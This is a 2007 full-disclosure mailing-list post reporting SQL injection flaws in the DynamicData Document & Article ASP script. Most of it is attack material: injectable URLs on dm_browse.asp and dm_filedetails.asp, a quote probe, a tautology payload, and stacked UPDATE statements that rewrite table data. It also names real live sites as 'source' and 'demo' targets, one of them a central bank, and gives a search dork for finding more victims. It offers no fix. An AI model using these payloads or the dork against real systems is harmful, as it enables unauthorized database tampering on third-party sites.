Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Full-disclosure] DVD Rental System multiple XSS and CSRF vulnerabilities

[Aria-Security.Net] Gallery In A Box Username & Password Parameters SQL Injection

[Aria-Security.Net] Next Gen Portfolio Manager SQL Injection

la-nai cms_v1.2.14 - Remote SQL Injection

From:	okan alp <codexploder_(at)_hotmail.com>
Date:	03.08.2007
Subject:	DynamicData(dms)Document&Article Script /dm_browse.asp.asp sql injection

DynamicData(dms)Document&Article Script /dm_browse.asp.asp sql injection


Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"


*****************************************************************************


1-)  example.com/[patch]/dm_browse.asp?pid=(sql methot)


1-)  example.com/dms/dm_browse.asp?pid=(sql methot)

1-)  example.com/dynamicdata/dm_browse.asp?pid=(sql methot)

1-)  example.com/dm_filedetails.asp?did=

*****************************************************************************

# example.com/dms/dm_browse.asp?pid=1'

# example.com/dynamicdata/dm_browse.asp?pid=1'

# example.com/dm_filedetails.asp?did=1'

1' or 1 having 1=1

# example.com/dms/dm_browse.asp?pid=1+update+tbl+set+col='text';--

# example.com/dynamicdata/dm_browse.asp?pid=1+update+tbl+set+col='text';--


# example.com/dm_filedetails.asp?did=1+update+tbl+set+col='text';--

*****************************************************************************

sourge site : http://racinebizservices.com/dynamicdata/dm_browse.asp  

demo site   : http://www.centralbank.org.bz/

order code for views sites :inurl:"dm_browse.asp?pid" "dm_filedetails.asp?did"